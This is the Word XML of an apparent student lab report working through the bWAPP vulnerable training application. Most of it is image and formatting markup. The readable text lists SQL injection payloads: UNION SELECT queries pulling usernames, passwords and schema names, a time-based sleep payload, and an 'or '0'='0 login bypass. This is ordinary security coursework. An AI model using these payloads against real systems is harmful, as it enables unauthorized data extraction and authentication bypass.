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9B0C8C">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="35153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AA7B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3361055" cy="867410"/>
            <wp:effectExtent l="0" t="0" r="444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E30D"/>
    <w:p w14:paraId="340B7CB3">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1828800" cy="1308735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53C2"/>
    <w:p w14:paraId="19182883">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="410210"/>
            <wp:effectExtent l="0" t="0" r="63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E5C6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:t>d) OS Command injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A88731">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="342265"/>
            <wp:effectExtent l="0" t="0" r="1206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490C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A8D1B2E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>d)</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="1666240" cy="285750"/>
            <wp:effectExtent l="0" t="0" r="1016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1E85">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3076575" cy="373380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FD4F">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="2241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AB4C"/>
    <w:p w14:paraId="053E0975">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="360680"/>
            <wp:effectExtent l="0" t="0" r="1206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5C06"/>
    <w:p w14:paraId="7E664E79">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="4724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43C9"/>
    <w:p w14:paraId="667D4911">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269865" cy="5016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2159"/>
    <w:p w14:paraId="4061079E">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="485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2E72"/>
    <w:p w14:paraId="3EDDFBF1">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="306070"/>
            <wp:effectExtent l="0" t="0" r="1905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E965"/>
    <w:p w14:paraId="49AADA6E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e) SQL injection (Get/Select)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B002F39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http://113.161.207.110:8000/sqli_2.php?movie=9&amp;action= go http://113.161.207.110:8000/sqli_2.php?movie=9&amp;action= go</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5ECBD3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542A4402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movie = payload movie = payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE40ECC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172647C2">
      <w:pP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40 union select 1,user(),3,4,password,6,7 from users 40 union select 1,user(),3,4,password,6,7 from users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  <w:t xml:space="preserve"> #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61873925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594FD8EF">
      <w:pP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  <w:t>g) SQL injection (Post/Search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27453FB3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 xml:space="preserve">Welcome http://113.161.207.110:8000/sqli_6.php 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begin"/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instrText xml:space="preserve"> HYPERLINK "http://113.161.207.110:8000/sqli_6.php" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>http://113.161.207.110:8000/sqli_6.php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end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7422800C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Surp suite; title = payload Surp suite; title = payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D30485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Iron’ union select 1, 2, 3, 4 ,5 ,6, 7 # Iron’ union select 1, 2, 3, 4 ,5 ,6, 7 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D23D8B2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Iron’ union select 1,2,3,@@version,user(),6,7 # Iron’ union select 1,2,3,@@version,user(),6,7 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4592D67A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3FF105A8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5FCB0ECA">
      <w:pP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  <w:t>h) SQL injection (Post/Select)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E8F2CB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 xml:space="preserve">Welcome http://113.161.207.110:8000/sqli_13.php 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begin"/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instrText xml:space="preserve"> HYPERLINK "http://113.161.207.110:8000/sqli_13.php" </w:instrTex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separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="4"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="Helvetica" w:cs="Helvetica"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:fill="FAFAFA"/>
        </w:rPr>
        <w:t>http://113.161.207.110:8000/sqli_13.php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end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF4DB7F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Surp suite; title = payload Surp suite; title = payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BAF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748D902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1337 union select 1, 2, 3, 4 ,5 ,6, 7 # 1337 union select 1, 2, 3, 4 ,5 ,6, 7 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC6BA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1337 union select 1,2,3,@@version,user(),6,7 # 1337 union select 1,2,3,@@version,user(),6,7 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31914D6B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  <w:t>SQL injection (Captcha)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D03951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Chars="0" w:right="0" w:rightChars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http://113.161.207.110:8000/sqli_9.php?title=1&amp;action= search http://113.161.207.110:8000/sqli_9.php?title=1&amp;action= search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F535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title = payload title = payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A9B1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6C0C981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1’ union+all+select 1,2,3,4,5,6,7..+ 1’ union+all+select 1,2,3,4,5,6,7..+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601AD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  <w:t>k) SQL injection (Login Form/Hero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8A3F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15" w:beforeLines="32" w:beforeAutospacing="0" w:after="18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http://113.161.207.110:8000/sqli_3.php http://113.161.207.110:8000/sqli_3.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711E5A2A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beforeAutospacing="0" w:after="18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title = payload title = payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B64BF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0’ or ’0’ = ’0 0’ or ’0’ = ’0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06F7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123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  <w:t>m) SQL injection - Stored (Blog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23F8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http://113.161.207.110:8000/sqli_11.php?title=a&amp;action= search http://113.161.207.110:8000/sqli_11.php?title=a&amp;action= search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C26C1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83" w:beforeLines="50" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="distribute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2F68EFC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title=payload title=payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67657A7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8" w:beforeLines="19" w:beforeAutospacing="0" w:after="253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praven’, (SELECT version()))-- praven’, (SELECT version()))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606441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praven’, (SELECT database()))-- praven’, (SELECT database()))--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5056BD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6" w:beforeLines="35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774A3AB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praven’,(select group_concat(table_name) FROM information_schema.tables where table_schema="bWAPP")) -- praven’,(select group_concat(table_name) FROM information_schema.tables where table_schema="bWAPP")) --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B02F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n) SQL injection - Stored (User-Agent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716739B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9" w:beforeLines="22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 xml:space="preserve">Welcome # http://113.161.207.110:8000/sqli_17.php #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instrText xml:space="preserve"> HYPERLINK "http://113.161.207.110:8000/sqli_17.php"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iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>http://113.161.207.110:8000/sqli_17.php</w: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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DFC6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# Burp suite; User-Agent: payload # Burp suite; User-Agent: payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0412A8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7C189B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peeven’, database()) -- - peeven’, database()) -- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC48C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428EF8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Welcome praven’, (select group_concat(table_name) FROM information_schema.tables where table_schema ="bWAPP") )# praven’, (select group_concat(table_name) FROM information_schema.tables where table_schema ="bWAPP") )# Welcome praven’, (select group_concat(table_name) FROM information_schema.tables where table_schema ="bWAPP") )# praven’, (select group_concat(table_name) FROM information_schema.tables where table_schema ="bWAPP") )#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E5B3F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238760</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1623695" cy="245745"/>
            <wp:effectExtent l="0" t="0" r="1905" b="8255"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon>
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="20093"/>
                <wp:lineTo x="21456" y="20093"/>
                <wp:lineTo x="2145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369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o) SQL jnjection - Stored (XML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E93CF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p) SQL injection - Blind - Boolean - Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6906F0F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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2602230" cy="934720"/>
            <wp:effectExtent l="0" t="0" r="127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79B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q) SQL injection - Blind - Time-Based</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261F5F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# http://113.161.207.110:8000/sqli_4.php Payload: iron man’ and sleep(5)# # http://113.161.207.110:8000/sqli_4.php Payload: iron man’ and sleep(5)#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229ECC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r) XML/XPath injection (Login Form)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C934B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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2484120" cy="883285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AD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s) XML/XPath injection (Search)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AFEFB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3365500" cy="1185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AC6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2.2.2 Broken Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5668458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a) Broken Authentication - Insecure Login Forms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C3A2E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# http://113.161.207.110:8000/ba_insecure_login_1.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272CC66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Login: 0’or’0=’0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA920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Password: 0’or’0=’0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC812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</w:p>
    <w:p w14:paraId="7530992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b) Session Management - Administrative Portals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168667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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2224405" cy="1680845"/>
            <wp:effectExtent l="0" t="0" r="1079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B8A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c) Broken Auth. - Password Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7677DA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2068195" cy="1769745"/>
            <wp:effectExtent l="0" t="0" r="190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81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32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</w:p>
    <w:p w14:paraId="629549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</w:p>
    <w:p w14:paraId="3CE4E06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57C8FE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434093A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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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66C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779E891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7A8847F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0139CF5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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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37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5407FE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</w:p>
    <w:p w14:paraId="0F178E2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1430797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Chars="0" w:right="0" w:rightChars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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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4579">
      <w:pPr>
        <w:bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17AFF8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5E0B311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327271C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548015B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192F3BB1">
      <w:pP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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5934710" cy="2803525"/>
            <wp:effectExtent l="0" t="0" r="8890" b="317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C52B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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2CC">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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5337">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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2A83">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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25AD">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="952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E2CA">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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5E10">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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71AB">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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F277">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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F194">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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5F23CB"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="945F23CB"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman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ABF"/>
    <w:rsid w:val="00141697"/>
    <w:rsid w:val="001C6BBB"/>
    <w:rsid w:val="003B419E"/>
    <w:rsid w:val="0048592B"/>
    <w:rsid w:val="00560ABF"/>
    <w:rsid w:val="1B9263C4"/>
    <w:rsid w:val="28163F89"/>
    <w:rsid w:val="7B3B7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0</Words>
  <Characters>1</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>149</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1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2025-06-22T09:09:00Z</dcterms:created>
  <dc:creator>Ho Tran</dc:creator>
  <cp:lastModifiedBy>Phương Anh Hồ Trần</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-13T02:12:43Z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675F0CFEFA5E4BCE98E4F4B358E4148F_12</vt:lpwstr>
  </property>
</Properties>
</file>